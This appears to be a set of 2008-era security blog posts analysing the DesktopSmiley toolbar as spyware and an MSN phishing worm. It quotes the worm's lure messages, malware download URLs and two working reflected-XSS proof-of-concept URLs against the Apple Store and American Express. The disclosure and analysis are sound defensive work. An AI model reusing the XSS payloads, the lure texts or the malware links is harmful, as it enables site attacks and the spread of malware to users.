The "DesktopSmiley, Not A Spyware" ToolBar

The "Not A Phishing Worm" really got me interested as it sent special Christmas messages so I decided to dig in just a bit. So as discovered, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to DesktopSmiley.com to download their toolbar. Which they say is "Not Spyware".

So we got a non-phishing worm downloading a non-spyware program, let's see its non-evil actions :)
The first thing I did was downloading the installer, which asks no questions and shows no EULA. It is also digitally signed by "DoubleD Advertising Limited", well that's really funny, we have got to give them that :)

So I ran it in a VM:






That is quite original! "A non-virtualized hardware system is required", of course anybody technical gets how lame this lie is :)
why would an IE toolbar "require" a "non-virtualized hardware", why would it even bother to check if it's running under a virtualized environment unless it has some illegal actions to hide?!

Well i am defiantly not going to execute it on my machine :)
Maby i will test is some other day on a real machine with Restore-IT/Ghost

In the meantime, let's take look at some of the things that it does:
It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ except for (AutoDetect and UNCAsIntranet which exist there and get modified):
ProxyBypass:1 (default 1)
IntranetName:1 (default 1)
MigrateProxy:1 (default 1)
AutoDetect:1 (default 0)
UNCAsIntranet:1 (default 0)
ProxyEnable:0 (default 0)

It sure looks like someone is going to assign a proxy for us :)

The setup process command-line:
"C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe" /new /src=user

the "/src=user" really sounds like there are cases which the user did not initiated the installation :) it could be used for self-update though.

Lets examine some of the the strings in the memory of this "DoubleD" software:
Software\SimonTatham\PuTTY\Sessions
Software\SimonTatham\PuTTY\SshHostKeys
Software\SimonTatham\PuTTY
\PUTTY.RND
Well, i don't want to point a blaming finger but it seems this "legitimate smiley IE toolbar" is very interested in getting some access to our saved PuTTY SSH hosts...quite innocent

There are a lot of weird stuff this spyware does, like starting a local proxy which explains how they steal data from IE and makes this self-updating software a cool way to make a non-botnet botnet :)
It also implements an SSH client and almost every famous encryption algorithm (rinjdeal, AES, des, 3des, blowfish) looks like it does local MITM attacks to SSH login software.

So get root and Smile away with it :)

Big Brands XSS

Apple Store - XSS (less then 15 minutes to find it, manually)
http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script>%3E%3Cdiv%20id=%22

American Express - HTTPS XSS (less then a minute to find it, manually)
https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22


How can us customers trust the big brand companies when our accounts are compromised and we can no longer trust links to those empires websites?!

The MSN "Not A Phishing Worm"

This is a funny one actually :)
I am just working as usual when I got the following message on my MSN Messenger:

This is how real girls party. Great high quality pictures on
http://jusmineza.PartyPicturez.info

Now of course i understood that it's a worm, but still, lets see where it leads to.
So I went into the site and it looked like this:



















With what i have seen until now, this is a classic phising site, I saw dozens
like it for Yahoo! in the past. But wait! lets look at that GREY text blow:

Terms of Use / Privacy Policy:

By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties. By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a "phishing" site that attempts to "trick" you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort.

T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN's terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 T P Ltd

OK, they said in the text:

This is not a "phishing" site that attempts to "trick" you into revealing personal information.

So they don't want our usernames and password, which is also the EMAIL of most people, yeah I believe them, sure.

They just want to:

1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

Which is completely different with what a worm does. A worm just spreads and "introduces", "entertaining" sites with a lot of porn and exploits.

By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.
.....
ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED

Yeah why not, take my account and send spam "on behalf of third parties" and if they get like hacked or something, we are not responsible, you agreed to this.

I believe this should be called "Legal Phishing User Agreement" or "Worm As A Service".
It is also a little wiered that a "legal" domain called "partypicturez.info" is dealing with MSN accounts and not PICTURES FROM PARTIES and has unlimited(*.) subdomains and only 1 page, don't you think?!
Ofcourse they used the domain protection:

Registrant Email:9648af2d68114548bfc703cca6806a46.protect@whoisguard.com
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard

Well, don't fill any form you see without reading the small (and in this case GREY) prints :)

Update:
The messages are updated by the hour, these ones are specific for xmas.
Any file or subdomain in win-win-it.com redirects to http://www.desktopsmiley.com/go.do?a=814
The same worm also sends this message:

"[msn_dst_user], claim your Prize!
http://[msn_src_user].win-win-it.com/winner.php"

And

congratulations [msn_dst_user]!!!
http://[msn_src_user].accept-your-gift.com/winner.php

And

merry XMAS heres your gift
http://[msn_src_user].specialofferforyou.info/gift.php

And

[msn_dst_user], claim your Xmas Card!
http://[msn_src_user].greeting-cardss.com/xmas.php

And

http://freegiftznow.com/xmas.php

And

[msn_dst_user], see the pics from yesterday's christmas party what do u think?
http://[msn_src_user].yourimagez.com/xmas.php

And this one, which redirects to http://www.xxxblackbook.com

Mmmm Babe!

Just got myself a naughty profile here. You should check me out before its too late!

http://www.theblogboards.com/profiles.php

And this one which is misconfigured and will not work the the subdomain contains an "_"

http://[msn_src_user].crazy-new-year-party-pics.com

And

http://nu-years.awesomeofferz.com

And

http://[msn_src_user].real-cool-newyear-party-pics.com

And

Claim your Prize! EXPIRY: TODAY!!!! Hurry
http://mypoemstoyou.com/winner.php

And

see pictures of me naked & fucking all night long!! LOL
http://www.seex4u.com/collegepics.php

And

see my 2009 new years party album i uploaded here <:o)<:o) http://2009-newyear-party-pics.com/party.php

And this which redirects to http://www.naughty-nightz.com/

see this blog
http://theblogboards.com/blog.php

And

hey babe... i created a profile here with some of my secret pictures.... dont wait too long .... signup to see!
http://www.date-me-now.com/myprofile.php

Which is also registered by WHOISGuard.
Both these websites were built to make people download this:
http://www.desktopsmiley.com/toolbar/desktopsmiley/download/stb_installer.exe

Which they claim is:

"Download DesktopSmiley to get 1000's of FREE Smileys!
It's totally FREE! No Registration. No Spyware."

Yes, a toolbar advertised by a WORM is not spyware, sure...
The example above was version 2.0c. It seems these guys used different methods and different domains and different company names in the older versions (which is typical to viruses and spyware but not to legitimate software).
The following example belongs to an older version 1.1c whi MSN message:

foto http://hi5.eu.com/id.php?=[dst_user_email]

Which prompts a download for "IMG455.jpg-www.photo.com" which is an EXE file with a COM extension and where ran "True Type Detection" will be made by windows loader and it will execute as the regular EXE file it is.
Those people don't care a bit and they left "Directory Browsing" open in the subdomain's root, check it out at: http://hi5.eu.com/
They even forgot to remove their private packer from the site: http://hi5.eu.com/pa-packer.rar

They also have a version at: http://new.upicx.com/ (which i think just went down...)
Which loads " http://new.upicx.com/indexx.php" and " http://new.upicx.com/pop.php" and VERIFYS the request's REFERER is " http://new.upicx.com/" so direct reference to these files returns "404 Not Found".